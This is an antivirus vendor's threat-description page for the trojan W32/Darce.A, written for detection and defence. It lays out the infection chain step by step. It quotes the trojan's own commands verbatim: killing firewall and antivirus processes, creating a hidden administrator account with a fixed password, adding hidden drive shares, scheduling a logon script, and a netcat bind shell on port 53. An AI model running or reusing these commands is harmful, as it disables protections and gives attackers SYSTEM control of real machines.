Lumension® Endpoint Intelligence Center

Intelligence Center » Browse All Threats » W32/Darce.A

Overview

Threat Risk LOW LOW
Destructivity MEDIUM MEDIUM
Payload
Detection files published
Description created 06 Feb 2005 10:19:00
Description updated 06 Feb 2005 10:19:00
Malware type TROJAN
Alias
Spreading mechanism
Summary None

W32/Darce.A

Spreading

When Darce.A is executed it drops several files on disk: readme.txt (copy of UnRAR) setup.exe (compiled batch file) unpack.rar (encrypted RAR file) setup.exe is then run, and it decrypts a batch file to c:\a7356.bat, which is then executed. The batch file performs the following operations: 1. Renames the dropped file readme.txt to cuk.exe. It then executes cuk.exe with the following command line: e unpack.rar %windir% -y -pko;XqZpX!qYpYlT -inul

This extracts 4 files from unpack.rar to the %WINDIR% directory:

schtasks.exe (Czech version of Microsoft’s Schedule Tasks) schvost.exe (NetCat for Windows) taskkill.exe (Czech version of Microsoft’s Task Kill) odbcjet.vbs (Visual Basic script used for performing tasks at logon)

2. Calls taskkill.exe with the following parameters:

/f /im kpf4ss.exe /f /im ccProxy.exe This forcefully terminates processes with the image names kpf4ss.exe (Kerio Personal Firewall 4 Service) and ccProxy.exe (Symantec AV component). The result is piped to a file named “%TEMP%\~015799.tmp". 3. Calls the following commands if the file %WINDIR%\system32\zonelabs\vsruledb.dll (ZoneAlarm firewall component) is not present on the system: hostname ipconfig /all The results of these commands are piped to %TEMP%\~015798.tmp. 4. Calls further commands to gather information about the system: ver chdir set tasklist net start dir /a /q "%SystemDrive%\" dir /a /q "%ProgramFiles%\" dir /a "%userprofile%"\.. dir /a d:\ net localgroup The results of all commands are piped to %TEMP%\~015799.tmp and %TEMP%\~0157998.tmp. 5. Uses NET USER to delete the HelpAssistant account and recreate it with the password “Cukotka5". The HelpAssistant account is then added to the Power Users group and deleted from the Users group. All results are piped to %TEMP%\~015799.tmp and %TEMP%\~015798.tmp. 6. Calls more commands which are piped to %TEMP%\~015799.tmp and %TEMP%\~015798.tmp: net localgroup administrators net localgroup "Power Users" net localgroup users cacls "%userprofile%" /e /c /p "helpassistant":f cacls . /e /c /p "helpassistant":f fsutil fsinfo drives net share RPC$=c: /remark:"Vyhrazeno systemu Windows" net share ACL$=d: /remark:"Vyhrazeno systemu Windows" net share USR$="%userprofile%" /remark:"Vychozi sdileni uzivatele" type %systemdrive%\boot.ini 7. Appends %TEMP%\~015798.tmp to %TEMP%\~015799.tmp. 8. Copies %TEMP%\~015799.tmp, which now contains a rather comprehensive overview of the system, to the following locations: %WINDIR%\system32\msmgmt.dll %HOMEDRIVE%\%HOMEPATH%\PNG00002.jpg 9. Schedules a task using schtasks.exe, which was previously dropped into the %WINDIR% folder. The parameters used are: /create /tn AT1 /tr %windir%\odbcjet.vbs /sc onlogon /ru system This creates a task with the name “AT1", and specifies that odbcjet.vbs should be scheduled to run at every logon under the user context NTAUTHORITY\SYSTEM. The file odbcjet.vbs, which was also dropped in to the %WINDIR% directory, is a Visual Basic script file that calls the following commands: net stop SharedAccess net stop alg.exe net stop sscansvc.exe schvost.exe -L -p 53 -e cmd.exe net user HelpAssistant /add net localgroup administrators helpassistant /add net share RPC$=c: /remark:Windows The above schvost command causes schvost.exe to listen on port 53 for incoming connections. This enables an attacker to connect to an infected machine on port 53 and control a remote command prompt running with SYSTEM privileges.

10. Calls Taskkill.exe with the following parameters if %WINDIR%commandedit.com is not present on the system:

/f /im setup.exe This will forcefully terminate setup.exe, the program which created the batch file. 11. Renames setup.exe to sesit.xls and then deletes the file. 12. Deletes unpack.rar and cuk.exe.

Payload Details

Creates a backdoor which listens for connections on port 53 (TCP).Prevents the following services from running:Application Layer Gateway Service (alg.exe)Windows Firewall/Internet Connection Sharing (ICS) (SharedAccess)GFI LANguard N.S.S. Scheduled Scans Service (sscansvc.exe)Creates an account in the administrators group called HelpAssistant, with the password “Cukotka5". Shares c:\ as RPC$.

Analysis

n/a

Removal

n/a


Last Updated: 12 Nov 2015 11:06:15